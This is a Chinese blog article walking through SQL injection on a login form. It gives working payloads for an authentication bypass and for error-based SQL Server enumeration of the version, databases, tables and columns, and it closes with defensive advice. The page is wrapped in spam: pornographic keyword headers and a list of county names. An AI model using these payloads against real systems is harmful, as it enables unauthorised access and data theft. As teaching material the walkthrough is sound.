亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

SQL注入全過程的深入分析是怎樣的

發布時間:2021-11-30 19:40:26 來源:億速云 閱讀:168 作者:柒染 欄目:數據庫

這篇文章將為大家詳細講解有關SQL注入全過程的深入分析是怎樣的,文章內容質量較高,因此小編分享給大家做個參考,希望大家閱讀完這篇文章后對相關知識有一定的了解。

分析了SQL注入全過程,具體如下:

初步注入--繞過驗證,直接登錄

公司網站登陸框如下:

可以看到除了賬號密碼之外,還有一個公司名的輸入框,根據輸入框的形式不難推出SQL的寫法如下:復制代碼 代碼如下: SELECT * From Table WHERE Name='XX' and Password='YY' and Corp='ZZ'

我發現前兩者都做一些檢查,而第三個輸入框卻疏忽了,漏洞就在這里!注入開始,在輸入框中輸入以下內容:

用戶名亂填,密碼留空,這種情況下點擊登錄按鈕后竟然成功登錄了。

我們看一下最終的SQL就會找到原因:復制代碼 代碼如下: SELECT * From Table WHERE Name='SQL inject' and Password='' and Corp='' or 1=1--'

從代碼可以看出,前一半單引號被閉合,后一半單引號被 “--”給注釋掉,中間多了一個永遠成立的條件“1=1”,這就造成任何字符都能成功登錄的結果。而Sql注入的危害卻不僅僅是匿名登錄。

中級注入--借助異常獲取信息

現在我們在第三個輸入框中寫入:

‘or 1=(SELECT @@version) –

如下:

后臺的SQL變成了這樣:

SELECT * From Table WHERE Name='SQL inject' and Password='' and Corp=''or 1=(SELECT @@VERSION)--'

判斷條件變成了1=(SELECT @@VERSION),

這個寫法肯定會導致錯誤,但出錯正是我們想要的。點擊登錄后,頁面出現以下信息:

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (SP3) - 10.0.5500.0 (X64) Sep 21 2011 22:45:45Copyright (c) 1988-2008 Microsoft Corporation Developer Edition (64-bit)on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) ' to data type int.

可怕的事情出現了,服務器的操作系統和SQL Server版本信息竟然通過錯誤顯示出來。

危害擴大--獲取服務器所有的庫名、表名、字段名

接著,我們在輸入框中輸入如下信息:復制代碼 代碼如下: t' or 1=(SELECT top 1 name FROM master..sysdatabases where name not in (SELECT top 0 name FROM master..sysdatabases))--

此時發現第三個輸入框有字數長度的限制,然而這種客戶端的限制形同虛設,

直接通過Google瀏覽器就能去除。

點擊登錄,返回的信息如下:

Conversion failed when converting the nvarchar value 'master' to data type int.

數據庫名稱“master”通過異常被顯示出來!依次改變上面SQL語句中的序號,

就能得到服務器上所有數據庫的名稱。

接著,輸入信息如下:復制代碼 代碼如下: b' or 1=(SELECT top 1 name FROM master..sysobjects where xtype='U' and name not in (SELECT top 1 name FROM master..sysobjects where xtype='U'))--

得到返回信息如下:

Conversion failed when converting the nvarchar value 'spt_fallback_db' to data type int.

我們得到了master數據庫中的第一張表名:“spt_fallback_db”,

同上,依次改變序號,可得到該庫全部表名。

現在我們以“spt_fallback_db”表為例,嘗試獲取該表中所有的字段名。在輸入框中輸入以下代碼:復制代碼 代碼如下: b' or 1=(SELECT top 1 master..syscolumns.name FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='spt_fallback_db');

于是,得到錯誤提示如下:

"Conversion failed when converting the nvarchar value 'xserver_name' to data type int.";

這樣第一個字段名“xserver_name”就出來了,依次改變序號,就能遍歷出所有的字段名。

最終目的--獲取數據庫中的數據

寫到這里,我們已知通過SQL注入能獲取全部的數據庫,表,及其字段,為了防止本文完全淪為注入教程,獲取數據的代碼就不再描述,而這篇文章的目的也已達到,SQL注入意味著什么?意味著數據庫中所有數據都能被盜取。

當知道這個危害以后,是否還能有人對SQL注入漏洞置之不理?

結語

關于安全性,總結出一下幾點:

1.對用戶輸入的內容要時刻保持警惕。

2. 只有客戶端的驗證等于沒有驗證。

3. 永遠不要把服務器錯誤信息暴露給用戶。

除此之外,我還要補充幾點:SQL注入不僅能通過輸入框,還能通過Url達到目的。

2. 除了服務器錯誤頁面,還有其他辦法獲取到數據庫信息。

3. 可通過軟件模擬注入行為,這種方式盜取信息的速度要比你想象中快的多。

4. 漏洞跟語言平臺無關。

關于SQL注入全過程的深入分析是怎樣的就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

sql
AI

余庆县| 安福县| 翁牛特旗| 吉安县| 龙泉市| 英山县| 鄄城县| 麻城市| 宁波市| 舟曲县| 江门市| 哈尔滨市| 海淀区| 清新县| 娄烦县| 龙口市| 台中县| 沙洋县| 吉木乃县| 禹城市| 且末县| 江源县| 利津县| 武义县| 柘城县| 海丰县| 西华县| 宝清县| 同江市| 喀喇沁旗| 阿拉善左旗| 中宁县| 丹江口市| 汝城县| 乾安县| 定西市| 弥勒县| 绥化市| 河源市| 宽甸| 盱眙县|